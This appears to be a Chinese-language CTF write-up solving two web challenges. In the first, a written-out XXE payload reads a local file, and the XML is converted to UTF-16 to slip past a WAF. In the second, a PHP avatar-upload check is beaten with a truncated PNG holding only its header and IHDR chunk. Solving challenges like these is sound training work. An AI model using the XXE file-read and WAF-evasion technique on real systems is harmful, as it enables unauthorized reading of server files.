[CSAWQual 2019]Web_Unagi
看提示有告诉你xml的格式
<?xml version='1.0'?>
<!DOCTYPE users [
<!ENTITY xxe SYSTEM "file:///flag" >]>
<users>
<user>
<username>bob</username>
<password>passwd2</password>
<name> Bob</name>
<email>[email protected]</email>
<group>&xxe;</group>
</user>
</users>
但如果在group和email的元素里显示长度会不够
通过对比User板块可以发现还有一个intro元素
<?xml version='1.0'?>
<!DOCTYPE users [
<!ENTITY xxe SYSTEM "file:///flag" >]>
<users>
<user>
<username>bob</username>
<password>passwd2</password>
<name> Bob</name>
<email>[email protected]</email>
<group>CSAW2019</group>
<intro>&xxe;</intro>
</user>
</users>
直接上传会提示被WAF拦截了,
通过iconv转换成utf-16编码绕过
iconv -f utf8 -t utf-16 1.xml>2.xml
iconv是linux用来转换文件编码方式的命令
[HarekazeCTF2019]Avatar Uploader 1
登录以后看到文件上传,这题是提供源码的
//upload.php
// check whether file is uploaded
if (!file_exists($_FILES['file']['tmp_name']) || !is_uploaded_file($_FILES['file']['tmp_name'])) {
error('No file was uploaded.');
}
// check file size
if ($_FILES['file']['size'] > 256000) {
error('Uploaded file is too large.');
}
// check file type
$finfo = finfo_open(FILEINFO_MIME_TYPE);
$type = finfo_file($finfo, $_FILES['file']['tmp_name']);
finfo_close($finfo);
if (!in_array($type, ['image/png'])) {
error('Uploaded file is not PNG format.');
}
// check file width/height
$size = getimagesize($_FILES['file']['tmp_name']);
if ($size[0] > 256 || $size[1] > 256) {
error('Uploaded image is too large.');
}
if ($size[2] !== IMAGETYPE_PNG) {
// I hope this never happens...
error('What happened...? OK, the flag for part 1 is: <code>' . getenv('FLAG1') . '</code>');
}
// ok
$filename = bin2hex(random_bytes(4)) . '.png';
move_uploaded_file($_FILES['file']['tmp_name'], UPLOAD_DIR . '/' . $filename);
$session->set('avatar', $filename);
flash('info', 'Your avatar has been successfully updated!');
redirect('/');
简单概括就是要让finfo_file判断是png但是getimagesize判断不是png就能得到flag。
finfo_file通过文件头来判断,getimagesize还通过长宽等很多其他信息来判断
找一张png图片看一下(ps.要求的图片尺寸要很小,我剪裁了好多次)
保留文件头,其他删掉试一下,记得多删掉一点,留下IHDR就可以了
上传后成功获得flag